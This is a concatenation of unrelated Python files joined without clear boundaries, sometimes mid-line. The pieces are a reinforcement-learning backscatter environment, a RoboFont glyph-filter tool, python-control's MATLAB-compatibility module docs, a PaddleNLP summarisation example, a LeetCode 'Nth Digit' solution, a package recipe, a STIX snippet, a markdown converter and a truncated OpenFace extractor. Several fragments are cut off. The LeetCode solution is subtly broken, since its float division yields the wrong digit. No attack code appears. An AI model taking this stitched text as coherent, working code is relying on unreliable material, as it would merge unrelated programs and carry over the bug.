transmit_time_1) reward += self.ST2.update(harvest_time_2, backscatter_time_2, transmit_time_2) reward += self.ST3.update(harvest_time_3, backscatter_time_3, transmit_time_3) throughtput = reward datawaiting_before = self.ST1.queue self.ST1.generateData() self.ST2.generateData() self.ST3.generateData() datawaiting = self.ST1.queue state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) else: # in case, assignment is not suitable reward = -10 throughtput = 0 datawaiting_before = self.ST1.queue if (self.ST1.queue == SecondTransmitor.QUEUE and self.ST2.queue == SecondTransmitor.QUEUE and self.ST3.queue == SecondTransmitor.QUEUE): self.ST1.reset() self.ST2.reset() self.ST3.reset() else: self.ST1.generateData() self.ST2.generateData() self.ST3.generateData() datawaiting = self.ST1.queue state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) print(np.array(self.state), reward, datawaiting, action) done = False # print(np.array(self.state), reward, done, {}) return np.array(self.state), [reward, throughtput, datawaiting_before, datawaiting], done, {} def reset(self): self.state = [] self.ST1.reset() self.ST2.reset() self.ST3.reset() state = [self.ST1.queue, self.ST1.energy, self.ST2.queue, self.ST2.energy, self.ST3.queue, self.ST3.energy] self.state = tuple(state) print(self.state) self.steps_beyond_done = None return np.array(self.state) def updateObservation(self): return def render(self, mode='human', close=False): return def close(self): """Override in your subclass to perform any necessary cleanup. Environments will automatically close() themselves when garbage collected or when the program exits. """ raise NotImplementedError() def seed(self, seed=None): """Sets the seed for this env's random number generator(s). 
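# --- Hedged illustration (hypothetical helper, not in BackscatterEnv3) -------
# step() derives the third transmitter's backscatter and transmit slots from
# whatever remains of the busy and idle periods; a negative remainder means
# the chosen action over-allocates the frame and is penalised instead.
TIME_FRAME, BUSY_TIMESLOT = 10, 4


def split_frame(harvest, b1, b2, t1, t2):
    b3 = BUSY_TIMESLOT - harvest - b1 - b2
    t3 = TIME_FRAME - BUSY_TIMESLOT - t1 - t2
    return b3, t3, (b3 >= 0 and t3 >= 0)


assert split_frame(1, 1, 1, 2, 2) == (1, 2, True)      # feasible allocation
assert split_frame(3, 1, 1, 2, 2)[2] is False          # busy period exceeded
# -----------------------------------------------------------------------------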
# Returns Returns the list of seeds used in this env's random number generators """ raise NotImplementedError() def configure(self, *args, **kwargs): """Provides runtime configuration to the environment. This configuration should consist of data that tells your environment how to run (such as an address of a remote server, or path to your ImageNet data). It should not affect the semantics of the environment. """ raise NotImplementedError() # env = BackscatterEnv3() # env.reset() # for index in range(0, 1000): # env.step(env.action_space.sample())0 #coding=utf-8 __version__ = 0.1 import shutil from robofab.world import RFont from defconAppKit.tools.textSplitter import splitText from vanilla import Window, List, Slider, CheckBox, EditText, SquareButton, Group, TextBox, Sheet, Tabs from vanilla.dialogs import getFile from mojo.UI import MultiLineView from mojo.events import addObserver, removeObserver from objects.manager import FiltersManager, makeKey class PenBallWizard(object): def __init__(self): self.filters = FiltersManager() self.glyphNames = [] self.cachedFont = RFont(showUI=False) self.currentFont = CurrentFont() filtersList = self.filters.get() if len(self.filters): self.currentFilterKey = filtersList[0] else: self.currentFilterKey = None self.fill = True self.observers = [ ('fontChanged', 'fontBecameCurrent'), ] self.w = Window((600, 400), 'PenBall Wizard v{0}'.format(__version__), minSize=(500, 400)) self.w.filtersPanel = Group((0, 0, 300, -0)) self.w.filtersPanel.filtersList = List((0, 0, -0, -40), filtersList, selectionCallback=self.filterSelectionChanged, doubleClickCallback=self.filterEdit, allowsMultipleSelection=False, allowsEmptySelection=False, rowHeight=22) self.w.filtersPanel.options = Group((0, -40, -0, 0)) self.w.filtersPanel.addFilter = SquareButton((0, -40, 150, 40), 'Add filter', sizeStyle='small', callback=self.addFilter) self.w.filtersPanel.removeFilter = SquareButton((-150, -40, 150, 40), 'Remove filter', sizeStyle='small', callback=self.removeFilter) self.w.filtersPanel.removeFilter.enable(False) self.w.textInput = EditText((300, 0, -90, 22), '', callback=self.stringInput) self.w.generate = SquareButton((-90, 0, 90, 22), 'Generate', callback=self.generateGlyphs, sizeStyle='small') self.w.preview = MultiLineView((300, 22, -0, -0)) self.w.switchFillStroke = SquareButton((-75, -40, 60, 25), 'Fill', callback=self.switchFillStroke, sizeStyle='small') displayStates = self.w.preview.getDisplayStates() for key in ['Show Metrics','Upside Down','Stroke','Beam','Inverse','Water Fall','Single Line']: displayStates[key] = False for key in ['Fill','Multi Line']: displayStates[key] = True self.w.preview.setDisplayStates(displayStates) for callback, event in self.observers: addObserver(self, callback, event) self.updateOptions() self.w.bind('close', self.end) self.w.open() def generateGlyphs(self, sender): font = self.currentFont newFont = RFont(showUI=False) if font is not None: glyphs = [font[glyphName] for glyphName in font.selection if glyphName in font] key, arguments = self.getFilterTokens() if key is not None: filteredGlyphs = [] for glyph in glyphs: if len(glyph.components) > 0: for comp in glyph.components: baseGlyphName = comp.baseGlyph baseGlyph = font[baseGlyphName] baseFilteredGlyph = baseGlyph.getRepresentation(key, **arguments) newFont.insertGlyph(baseFilteredGlyph, baseGlyphName) filteredGlyph = glyph.getRepresentation(key, **arguments) if filteredGlyph is not None: newFont.insertGlyph(filteredGlyph, glyph.name) newFont.showUI() def getFilterTokens(self): if 
self.currentFilterKey is not None: key = makeKey(self.currentFilterKey) currentFilter = self.getCurrentFilter() arguments = currentFilter['arguments'] if currentFilter.has_key('arguments') else {} return key, arguments return None, None def updateFiltersList(self): filtersList = self.filters.get() self.w.filtersPanel.filtersList.set(filtersList) def setArgumentValue(self, sender): value = sender.get() valueType = sender.type if valueType == 'bool': value = bool(value) key = sender.name if self.currentFilterKey is not None: self.filters.setFilterArgument(self.currentFilterKey, key, value) self.updatePreview() def processGlyphs(self): font = self.currentFont if font is not None: glyphs = [font[glyphName] for glyphName in self.glyphNames if glyphName in font] key, arguments = self.getFilterTokens() if key is not None: filteredGlyphs = [] for glyph in glyphs: if len(glyph.components) > 0: for comp in glyph.components: baseGlyphName = comp.baseGlyph baseGlyph = font[baseGlyphName] baseFilteredGlyph = baseGlyph.getRepresentation(key, **arguments) self.cachedFont.insertGlyph(baseFilteredGlyph, baseGlyphName) filteredGlyph = glyph.getRepresentation(key, **arguments) if filteredGlyph is not None: self.cachedFont.insertGlyph(filteredGlyph, glyph.name) filteredGlyphs.append(self.cachedFont[glyph.name]) return filteredGlyphs self.cachedFont = self.currentFont return glyphs return [] def updatePreview(self): glyphs = self.processGlyphs() self.w.preview.setFont(self.cachedFont) self.w.preview.set(glyphs) def updateOptions(self): if hasattr(self.w.filtersPanel, 'options'): delattr(self.w.filtersPanel, 'options') if self.currentFilterKey is not None: currentFilter = self.getCurrentFilter() arguments = currentFilter['arguments'] if currentFilter.has_key('arguments') else {} limits = currentFilter['limits'] if currentFilter.has_key('limits') else {} height = (len(arguments) * 40) + 40 self.w.filtersPanel.filtersList.setPosSize((0, 0, -0, -height)) self.w.filtersPanel.options = Group((0, -height, -0, -40)) for i, (arg, value) in enumerate(arguments.items()): attrName = 'option{0}'.format(i) valueType = None if limits.has_key(arg): mini, maxi = limits[arg] else: mini, maxi = 0, 100 if isinstance(value, bool): setattr(self.w.filtersPanel.options, attrName, CheckBox((15, 15 + (i*30), -15, 22), arg, value=value, callback=self.setArgumentValue, sizeStyle='small')) valueType = 'bool' elif isinstance(value, (str, unicode)): setattr(self.w.filtersPanel.options, attrName, EditText((15, 15 + (i*30), -15, 22), value, callback=self.setArgumentValue, sizeStyle='small')) elif isinstance(value, (int, float)): setattr(self.w.filtersPanel.options, attrName+'Title', TextBox((15, 18 + (i*30), 150, 22), arg, sizeStyle='small')) setattr(self.w.filtersPanel.options, attrName, Slider((168, 15 + (i*30), -15, 22), minValue=mini, maxValue=maxi, value=value, callback=self.setArgumentValue)) control = getattr(self.w.filtersPanel.options, attrName) control.name = arg control.type = valueType def stringInput(self, sender): text = sender.get() if self.currentFont is not None: cmap = self.currentFont.getCharacterMapping() self.glyphNames = splitText(text, cmap) else: self.glyphNames = [] self.updatePreview() def filterEdit(self, sender): filterName = self.currentFilterKey self.buildFilterSheet(filterName) self.filterSheet.open() def buildFilterSheet(self, filterName='', makeNew=False): sheetFields = { 'fileName': '', 'modulePath': '', 'filterObject': '', 'limits': {}, 'arguments': {}, } if filterName != '': filterDict = 
self.filters[filterName] for key in filterDict: sheetFields[key] = filterDict[key] self.filterSheet = Sheet((0, 0, 400, 350), self.w) self.filterSheet.new = makeNew applyTitle = 'Add Filter' if filterName == '' else 'Update Filder' self.filterSheet.apply = SquareButton((-115, -37, 100, 22), applyTitle, callback=self.processFilter, sizeStyle='small') self.filterSheet.cancel = SquareButton((-205, -37, 80, 22), 'Cancel', callback=self.closeFilterSheet, sizeStyle='small') y = 20 self.filterSheet.nameTitle = TextBox((15, y, 100, 22), 'Filter Name') self.filterSheet.name = EditText((125, y, -15, 22), filterName) y += 22 tabs = ['module','file'] y += 20 self.filterSheet.importPath = Tabs((15, y, -15, 75), tabs) modulePath = self.filterSheet.importPath[0] filePath = self.filterSheet.importPath[1] modulePath.pathInput = EditText((10, 10, -10, -10), sheetFields['modulePath']) filePath.pathInput = EditText((10, 10, -110, -10), sheetFields['fileName']) if len(sheetFields['modulePath']) > 0: self.filterSheet.importPath.set(0) elif len(sheetFields['fileName']) > 0: self.filterSheet.importPath.set(1) filePath.fileInput = SquareButton((-100, 10, 90, -10), u'Add File…', sizeStyle='small', callback=self.getFile) y += 75 y += 10 self.filterSheet.filterObjectTitle = TextBox((15, y, 100, 22), 'Filter Object (pen, function)') self.filterSheet.filterObject = EditText((125, y, -15, 22), sheetFields['filterObject']) y += 22 y += 20 columns = [ {'title': 'argument', 'width': 160, 'editable':True}, {'title': 'value', 'width': 71, 'editable':True}, {'title': 'min', 'width': 49, 'editable':True}, {'title': 'max', 'width': 49, 'editable':True} ] arguments = sheetFields['arguments'] limits = sheetFields['limits'] argumentItems = [] for key, value in arguments.items(): if isinstance(value, bool): value = str(value) elif isinstance(value, float): value = round(value, 2) argItem = { 'argument': key, 'value': value } if limits.has_key(key): minimum, maximum = sheetFields['limits'][key] argItem['min'] = minimum argItem['max'] = maximum argumentItems.append(argItem) buttonSize = 20 gutter = 7 self.filterSheet.arguments = List((15 + buttonSize + gutter, y, -15, -52), argumentItems, columnDescriptions=columns, allowsMultipleSelection=False, allowsEmptySelection=False) self.filterSheet.addArgument = SquareButton((15, -52-(buttonSize*2)-gutter, buttonSize, buttonSize), '+', sizeStyle='small', callback=self.addArgument) self.filterSheet.removeArgument = SquareButton((15, -52-buttonSize, buttonSize, buttonSize), '-', sizeStyle='small', callback=self.removeArgument) if len(argumentItems) == 0: self.filterSheet.removeArgument.enable(False) if filterName == '': self.currentFilterKey = '' def addArgument(self, sender): argumentsList = self.filterSheet.arguments.get() argumentsList.append({'argument': 'rename me', 'value': 50, 'min': 0, 'max': 100}) if len(argumentsList) > 0: self.filterSheet.removeArgument.enable(True) self.filterSheet.arguments.set(argumentsList) def removeArgument(self, sender): argumentsList = self.filterSheet.arguments.get() if len(argumentsList) == 0: self.filterSheet.removeArgument.enable(False) selection = self.filterSheet.arguments.getSelection()[0] argumentsList.pop(selection) self.filterSheet.arguments.set(argumentsList) def getFile(self, sender): path = getFile(fileTypes=['py'], allowsMultipleSelection=False, resultCallback=self.loadFilePath, parentWindow=self.filterSheet) def loadFilePath(self, paths): path = paths[0] fileName = path.split('/')[-1] folder = '/'.join(__file__.split('/')[:-1]) dest = 
'{0}/filterObjects/{1}'.format(folder, fileName) shutil.copyfile(path, dest) self.filterSheet.importPath[1].pathInput.set(fileName[:-3]) def closeFilterSheet(self, sender): self.filterSheet.close() delattr(self, 'filterSheet') def processFilter(self, sender): argumentsList = self.filterSheet.arguments.get() filterName = self.filterSheet.name.get() filterDict = {} if len(filterName) > 0: index = self.filterSheet.importPath.get() mode = ['modulePath','fileName'][index] filterDict[mode] = importString = self.filterSheet.importPath[index].pathInput.get() if len(importString) > 0: filterDict['filterObject'] = filterObject = self.filterSheet.filterObject.get() if len(filterObject) > 0: for argItem in argumentsList: if argItem.has_key('argument'): key = argItem['argument'] if argItem.has_key('value'): value = self.parseValue(argItem['value']) if not filterDict.has_key('arguments'): filterDict['arguments'] = {} filterDict['arguments'][key] = value if argItem.has_key('min') and argItem.has_key('max'): try: mini, maxi = float(argItem['min']), float(argItem['max']) if not filterDict.has_key('limits'): filterDict['limits'] = {} filterDict['limits'][key] = (mini, maxi) except: pass if filterName in self.filters: self.filters[filterName] = filterDict elif self.filterSheet.new == False: index = self.w.filtersPanel.filtersList.getSelection()[0] self.filters.changeFilterNameByIndex(index, filterName) self.filters[filterName] = filterDict elif self.filterSheet.new == True: self.filters.addFilter(filterName, filterDict) self.closeFilterSheet(sender) self.updateFiltersList() self.updateOptions() self.updatePreview() def addFilter(self, sender): self.buildFilterSheet(makeNew=True) self.filterSheet.open() def removeFilter(self, sender): filterName = self.currentFilterKey self.filters.removeFilter(filterName) self.updateFiltersList() def filterSelectionChanged(self, sender): selectedFilterName = self.getSelectedFilterName() if selectedFilterName in ['Flatten', 'Jitter']: self.w.filtersPanel.removeFilter.enable(False) else: self.w.filtersPanel.removeFilter.enable(True) self.cachedFont = RFont(showUI=False) self.currentFilterKey = selectedFilterName self.updateOptions() self.updatePreview() def getCurrentFilter(self): return self.filters[self.currentFilterKey] def getSelectedFilterName(self): filtersList = self.w.filtersPanel.filtersList filterNamesList = filtersList.get() selection = filtersList.getSelection()[0] return filterNamesList[selection] def switchFillStroke(self, sender): self.fill = not self.fill displayStates = self.w.preview.getDisplayStates() if self.fill == True: sender.setTitle('Fill') displayStates['Fill'] = True displayStates['Stroke'] = False elif self.fill == False: sender.setTitle('Stroke') displayStates['Fill'] = False displayStates['Stroke'] = True self.w.preview.setDisplayStates(displayStates) def parseValue(self, value): if isinstance(value, bool): value = bool(value) elif isinstance(value, (str, unicode)) and value.lower() == 'true': value = True elif isinstance(value, (str, unicode)) and value.lower() == 'false': value = False elif value is not '' or value is not None: try: value = float(value) except: pass return value def fontChanged(self, notification): self.currentFont = notification['font'] self.cachedFont = RFont(showUI=False) self.updatePreview() def end(self, notification): self.filters.update() for callback, event in self.observers: removeObserver(self, event) PenBallWizard() if __name__ == '__main__': import unittestcontrol/matlab/__init__.py # -*- coding: utf-8 -*- """ The 
:mod:`control.matlab` module contains a number of functions that emulate some of the functionality of MATLAB. The intent of these functions is to provide a simple interface to the python control systems library (python-control) for people who are familiar with the MATLAB Control Systems Toolbox (tm). """ """Copyright (c) 2009 by California Institute of Technology All rights reserved. Copyright (c) 2011 by Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the California Institute of Technology nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Author: Date: 29 May 09 Revised: , Dec 10 $Id$ """ # Import MATLAB-like functions that are defined in other packages from scipy.signal import zpk2ss, ss2zpk, tf2zpk, zpk2tf from numpy import linspace, logspace # If configuration is not yet set, import and use MATLAB defaults import sys if not ('.config' in sys.modules): from .. import config config.use_matlab_defaults() # Control system library from ..statesp import * from ..xferfcn import * from ..lti import * from ..frdata import * from ..dtime import * from ..exception import ControlArgument # Import MATLAB-like functions that can be used as-is from ..ctrlutil import * from ..freqplot import nyquist, gangof4 from ..nichols import nichols from ..bdalg import * from ..pzmap import * from ..statefbk import * from ..delay import * from ..modelsimp import * from ..mateqn import * from ..margins import margin from ..rlocus import rlocus from ..dtime import c2d from ..sisotool import sisotool # Import functions specific to Matlab compatibility package from .timeresp import * from .wrappers import * r""" The following tables give an overview of the module ``control.matlab``. They also show the implementation progress and the planned features of the module. The symbols in the first column show the current state of a feature: * ``*`` : The feature is currently implemented. * ``-`` : The feature is not planned for implementation. * ``s`` : A similar feature from another library (Scipy) is imported into the module, until the feature is implemented here. 
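A hedged usage sketch of the compatibility layer (function names are taken
from the tables below; exact return shapes and argument defaults may differ
between python-control versions)::

    from control.matlab import tf, ss, c2d, step

    G = tf([1.0], [1.0, 2.0, 1.0])   # transfer function 1/(s^2 + 2s + 1)
    sys = ss(G)                      # convert to a state-space model
    sysd = c2d(sys, 0.1)             # discretize with a 0.1 s sample time
    yout, T = step(G)                # MATLAB-style step response (output first)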
Creating linear models ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`tf` create transfer function (TF) models \ zpk create zero/pole/gain (ZPK) models. \* :func:`ss` create state-space (SS) models \ dss create descriptor state-space models \ delayss create state-space models with delayed terms \* :func:`frd` create frequency response data (FRD) models \ lti/exp create pure continuous-time delays (TF and ZPK only) \ filt specify digital filters \- lti/set set/modify properties of LTI models \- setdelaymodel specify internal delay model (state space only) \* :func:`rss` create a random continuous state space model \* :func:`drss` create a random discrete state space model == ========================== ============================================ Data extraction ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`tfdata` extract numerators and denominators \ lti/zpkdata extract zero/pole/gain data \ lti/ssdata extract state-space matrices \ lti/dssdata descriptor version of SSDATA \ frd/frdata extract frequency response data \ lti/get access values of LTI model properties \ ss/getDelayModel access internal delay model (state space) == ========================== ============================================ Conversions ---------------------------------------------------------------------------- == ============================ ============================================ \* :func:`tf` conversion to transfer function \ zpk conversion to zero/pole/gain \* :func:`ss` conversion to state space \* :func:`frd` conversion to frequency data \* :func:`c2d` continuous to discrete conversion \ d2c discrete to continuous conversion \ d2d resample discrete-time model \ upsample upsample discrete-time LTI systems \* :func:`ss2tf` state space to transfer function \s :func:`~scipy.signal.ss2zpk` transfer function to zero-pole-gain \* :func:`tf2ss` transfer function to state space \s :func:`~scipy.signal.tf2zpk` transfer function to zero-pole-gain \s :func:`~scipy.signal.zpk2ss` zero-pole-gain to state space \s :func:`~scipy.signal.zpk2tf` zero-pole-gain to transfer function == ============================ ============================================ System interconnections ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.append` group LTI models by appending inputs/outputs \* :func:`~control.parallel` connect LTI models in parallel (see also overloaded ``+``) \* :func:`~control.series` connect LTI models in series (see also overloaded ``*``) \* :func:`~control.feedback` connect lti models with a feedback loop \ lti/lft generalized feedback interconnection \* :func:`~control.connect` arbitrary interconnection of lti models \ sumblk summing junction (for use with connect) \ strseq builds sequence of indexed strings (for I/O naming) == ========================== ============================================ System gain and dynamics ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`dcgain` steady-state (D.C.) 
gain \ lti/bandwidth system bandwidth \ lti/norm h2 and Hinfinity norms of LTI models \* :func:`pole` system poles \* :func:`zero` system (transmission) zeros \ lti/order model order (number of states) \* :func:`~control.pzmap` pole-zero map (TF only) \ lti/iopzmap input/output pole-zero map \* :func:`damp` natural frequency, damping of system poles \ esort sort continuous poles by real part \ dsort sort discrete poles by magnitude \ lti/stabsep stable/unstable decomposition \ lti/modsep region-based modal decomposition == ========================== ============================================ Time-domain analysis ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`step` step response \ stepinfo step response characteristics \* :func:`impulse` impulse response \* :func:`initial` free response with initial conditions \* :func:`lsim` response to user-defined input signal \ lsiminfo linear response characteristics \ gensig generate input signal for LSIM \ covar covariance of response to white noise == ========================== ============================================ Frequency-domain analysis ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`bode` Bode plot of the frequency response \ lti/bodemag Bode magnitude diagram only \ sigma singular value frequency plot \* :func:`~control.nyquist` Nyquist plot \* :func:`~control.nichols` Nichols plot \* :func:`margin` gain and phase margins \ lti/allmargin all crossover frequencies and margins \* :func:`freqresp` frequency response over a frequency grid \* :func:`evalfr` frequency response at single frequency == ========================== ============================================ Model simplification ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.minreal` minimal realization; pole/zero cancellation \ ss/sminreal structurally minimal realization \* :func:`~control.hsvd` hankel singular values (state contributions) \* :func:`~control.balred` reduced-order approximations of LTI models \* :func:`~control.modred` model order reduction == ========================== ============================================ Compensator design ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`rlocus` evans root locus \* :func:`sisotool` SISO controller design \* :func:`~control.place` pole placement \ estim form estimator given estimator gain \ reg form regulator given state-feedback and estimator gains == ========================== ============================================ LQR/LQG design ---------------------------------------------------------------------------- == ========================== ============================================ \ ss/lqg single-step LQG design \* :func:`~control.lqr` linear quadratic (LQ) state-fbk regulator \ dlqr discrete-time LQ state-feedback regulator \ lqry LQ regulator with output weighting \ lqrd discrete LQ regulator for continuous plant \ ss/lqi Linear-Quadratic-Integral (LQI) controller \ ss/kalman Kalman state estimator \ ss/kalmd discrete Kalman estimator for cts plant \ ss/lqgreg build LQG regulator from LQ gain and Kalman estimator \ ss/lqgtrack build LQG servo-controller 
\ augstate augment output by appending states == ========================== ============================================ State-space (SS) models ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`rss` random stable cts-time state-space models \* :func:`drss` random stable disc-time state-space models \ ss2ss state coordinate transformation \ canon canonical forms of state-space models \* :func:`~control.ctrb` controllability matrix \* :func:`~control.obsv` observability matrix \* :func:`~control.gram` controllability and observability gramians \ ss/prescale optimal scaling of state-space models. \ balreal gramian-based input/output balancing \ ss/xperm reorder states. == ========================== ============================================ Frequency response data (FRD) models ---------------------------------------------------------------------------- == ========================== ============================================ \ frd/chgunits change frequency vector units \ frd/fcat merge frequency responses \ frd/fselect select frequency range or subgrid \ frd/fnorm peak gain as a function of frequency \ frd/abs entrywise magnitude of frequency response \ frd/real real part of the frequency response \ frd/imag imaginary part of the frequency response \ frd/interp interpolate frequency response data \* :func:`~control.mag2db` convert magnitude to decibels (dB) \* :func:`~control.db2mag` convert decibels (dB) to magnitude == ========================== ============================================ Time delays ---------------------------------------------------------------------------- == ========================== ============================================ \ lti/hasdelay true for models with time delays \ lti/totaldelay total delay between each input/output pair \ lti/delay2z replace delays by poles at z=0 or FRD phase shift \* :func:`~control.pade` pade approximation of time delays == ========================== ============================================ Model dimensions and characteristics ---------------------------------------------------------------------------- == ========================== ============================================ \ class model type ('tf', 'zpk', 'ss', or 'frd') \ isa test if model is of given type \ tf/size model sizes \ lti/ndims number of dimensions \ lti/isempty true for empty models \ lti/isct true for continuous-time models \ lti/isdt true for discrete-time models \ lti/isproper true for proper models \ lti/issiso true for single-input/single-output models \ lti/isstable true for models with stable dynamics \ lti/reshape reshape array of linear models == ========================== ============================================ Overloaded arithmetic operations ---------------------------------------------------------------------------- == ========================== ============================================ \* \+ and - add, subtract systems (parallel connection) \* \* multiply systems (series connection) \ / right divide -- sys1\*inv(sys2) \- \\ left divide -- inv(sys1)\*sys2 \ ^ powers of a given system \ ' pertransposition \ .' transposition of input/output map \ .\* element-by-element multiplication \ [..] 
concatenate models along inputs or outputs \ lti/stack stack models/arrays along some dimension \ lti/inv inverse of an LTI system \ lti/conj complex conjugation of model coefficients == ========================== ============================================ Matrix equation solvers and linear algebra ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.lyap` solve continuous-time Lyapunov equations \* :func:`~control.dlyap` solve discrete-time Lyapunov equations \ lyapchol, dlyapchol square-root Lyapunov solvers \* :func:`~control.care` solve continuous-time algebraic Riccati equations \* :func:`~control.dare` solve disc-time algebraic Riccati equations \ gcare, gdare generalized Riccati solvers \ bdschur block diagonalization of a square matrix == ========================== ============================================ Additional functions ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.gangof4` generate the Gang of 4 sensitivity plots \* :func:`~numpy.linspace` generate a set of numbers that are linearly spaced \* :func:`~numpy.logspace` generate a set of numbers that are logarithmically spaced \* :func:`~control.unwrap` unwrap phase angle to give continuous curve == ========================== ============================================ """ # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from paddlenlp.transformers import UNIMOLMHeadModel, UNIMOTokenizer model_name = 'unimo-text-1.0-lcsts-new' model = UNIMOLMHeadModel.from_pretrained(model_name) tokenizer = UNIMOTokenizer.from_pretrained(model_name) def postprocess_response(token_ids, tokenizer): """Post-process the decoded sequence. 
Truncate from the first .""" eos_pos = len(token_ids) for i, tok_id in enumerate(token_ids): if tok_id == tokenizer.mask_token_id: eos_pos = i break token_ids = token_ids[:eos_pos] tokens = tokenizer.convert_ids_to_tokens(token_ids) tokens = tokenizer.merge_subword(tokens) return tokens inputs = "深度学习是人工智能的核心技术领域。百度飞桨作为中国首个自主研发、功能丰富、开源开放的产业级深度学习平台,将从多层次技术产品、产业AI人才培养和强大的生态资源支持三方面全面护航企业实现快速AI转型升级。" inputs_ids = tokenizer.gen_encode( inputs, add_start_token_for_decoding=True, return_tensors=True, is_split_into_words=False) model.eval() outputs, _ = model.generate( input_ids=inputs_ids['input_ids'], token_type_ids=inputs_ids['token_type_ids'], position_ids=inputs_ids['position_ids'], attention_mask=inputs_ids['attention_mask'], max_length=64, decode_strategy='beam_search', num_beams=2) result = postprocess_response(outputs[0].numpy(), tokenizer) result = "".join(result) print("Model input:", inputs) print("Result:", result) # 百度飞桨:深度学习助力企业转型升级 610yilingliu/leetcode # # @lc app=leetcode id=400 lang=python3 # # [400] Nth Digit # # @lc code=start class Solution(object): def findNthDigit(self, n): """ :type n: int :rtype: int """ N=1 while n>0: r= 9* 10**(N-1)*N if n>r: n-=r N+=1 else: number= 10**(N-1) + (n-1)/N return int(str(number)[(n-1)%N]) # @lc code=end # def merge(l1, l2): # ans = [] # # 如果l1和l2都不为空 # while l1 and l2: # # 如果l1的第一个元素小于等于l2的第二个元素 # if l1[0] <= l2[0]: # # 将l1的第一个元素加入answer # ans.append(l1[0]) # # 把l1中的第一个元素从l1中删除 # l1.pop(0) # else: # ans.append(l2[0]) # l2.pop(0) # # 如果剩下的,还有元素的列表是l1 # if l1: # # 拼接ans和剩余l1 # return ans + l1 # # 如果剩余的列表是l2,拼接ans和l2 # return ans + l2 matu3ba/cports pkgname = "python-six" pkgver = "1.16.0" pkgrel = 0 build_style = "python_module" hostmakedepends = ["python-setuptools"] checkdepends = ["python-pytest"] depends = ["python"] pkgdesc = "Python compatibility utilities" maintainer = "q66 <>" license = "MIT" url = "https://github.com/benjaminp/six" source = f"$(PYPI_SITE)/s/six/six-{pkgver}.tar.gz" sha256 = "1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926" # pytest not packaged yet options = ["!check"] def post_install(self): self.install_license("LICENSE") #!/usr/bin/env python3 import sys grid = [False]*(128*8) ans = -1 for line in sys.stdin: s = line.rstrip().replace('B', '1').replace('F', '0').replace('L', '0').replace('R', '1') s = int(s, 2) ans = max(s, ans) print(ans) 0 from stix.core import STIXPackage from stix.report import Report from stix.report.header import Header stix_package=STIXPackage() stix_report=Report() stix_report.header=Header() stix_report.header.description="Getting Started" stix_package.add(stix_report) print(stix_package.to_xml())from pathlib import Path import glob def replace(fn): with Path(fn).open('r') as f: lines = f.readlines() new_lines = [] is_start = True no_lang = False for i, l in enumerate(lines): if '```' in l: if is_start: try: lang = l.split('```')[-1].split('\n')[0].replace(' ', '') except: lang = '' if lang: print('replacing language {} at line {} in file {}'.format( lang, i, fn )) new_lines += ['{% highlight ' + lang + ' %}\n'] else: new_lines += l no_lang = True is_start = False else: try: lang = l.split('```')[-1].split('\n')[0].replace(' ', '') except: lang = '' if lang: raise ValueError('Error. 
closing ``` might be missing in file', fn) if no_lang: new_lines += l no_lang = False else: new_lines += ['{% endhighlight %}\n'] is_start = True else: new_lines += [l] with Path(fn).open('w') as f: f.writelines(new_lines) if __name__ == '__main__': print('Replacing ``` by highlight tags if a language is specified') path = Path().absolute() files = list(glob.iglob(str(path) + '/**/*.md', recursive=True)) for filename in files: replace(filename) from dataclasses import make_dataclass from typing import Dict, List NAMES: List[str] = [ "V1", "n", "KI", "K1", "V2", "K2", "k3", "K3", "k4", "K4", "V5", "K5", "V6", "K6", "k7", "K7", "k8", "K8", "V9", "K9", "V10", "K10", ] NUM: int = len(NAMES) Parameters = make_dataclass( cls_name="Parameters", fields=[(name, int) for name in NAMES], namespace={"NAMES": NAMES, "NUM": NUM}, frozen=True, ) name2idx: Dict[str, int] = {k: v for v, k in enumerate(NAMES)} C = Parameters(**name2idx) del name2idx tools/extract_au.py """ Created on Apr 15, 2019 @author: """ import os import subprocess import inspect import time import glob import argparse import csv import numpy as np import pickle class AUSDetector(object): """Using OpenFace to detect Action Units""" def __init__(self): super(AUSDetector, 